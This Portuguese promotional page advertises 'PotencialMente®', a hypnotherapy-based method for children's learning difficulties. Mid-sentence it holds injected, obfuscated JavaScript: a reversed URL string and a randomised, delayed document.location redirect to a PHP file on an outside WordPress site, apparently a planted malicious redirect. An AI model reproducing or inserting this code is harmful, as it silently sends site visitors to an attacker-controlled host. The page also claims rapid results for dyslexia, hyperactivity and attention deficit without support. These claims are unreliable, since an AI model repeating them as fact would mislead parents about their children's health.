Loading...

Todos os dias nos questionamos: como melhorar a aprendizagem e o comportamento de crianças e jovens?

A resposta nem sempre é fácil. O insucesso escolar gera ansiedade em alunos, pais e professores, degradam a relação de confiança entre eles e geram alterações no comportamento das crianças e dos jovens. Falta de apetite, intolerância à frustração, irritabilidade, agressividade (física ou verbal), choro fácil, dores abdominais, diarreias, alergias, isolamento, olhar triste, olheiras, sono agitado, dificuldades em dormir, fuga à escola, dificuldades de memória e/ou de atenção, distratibilidade, são alguns dos sintomas mais visíveis dos estados de ansiedade de crianças e jovens em sofrimento. Sim, porque todos queremos ter sucesso!

O que fazer? Perceber e potenciar as capacidades da mente de cada uma destas crianças e jovens.

Destinado a crianças, adolescentes e jovens, PotencialMente® é um método terapêutico, desenvolvido pela doutora Maria Amélia Dias-Martins, ao longo de 20 anos de experiência terapêutica e 36 de experiência docente, que potencia a mente para a aprendizagem. Destinado a crianças e jovens com dificuldades na aprendizagem, é um método eficaz e não invasivo, com resultados rápidos e notórios ao nível da dislexia, hiperatividade, défice de atenção, problemas de comportamento, (…)

PotencialMente® é um método terapêutico inovador de promoção da saúde, da aprendizagem e comportamento, da profissão e do bem-estar pessoal.

Potencialmente® é um modelo terapêutico que une uma  abordagem  neuropsicopedagógica a uma  abordagem hipnoterapêutica, potenci$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ando a mente para aprender, porque:
– Potencializa áreas cerebrais fundamentais para a aprendizagem,
– Potencializa a perceção de capacidade pessoal,
– Potencializa a capacidade de atenção,
– Potencializa o comportamento adequado,
– Potencializa o bem estar pessoal.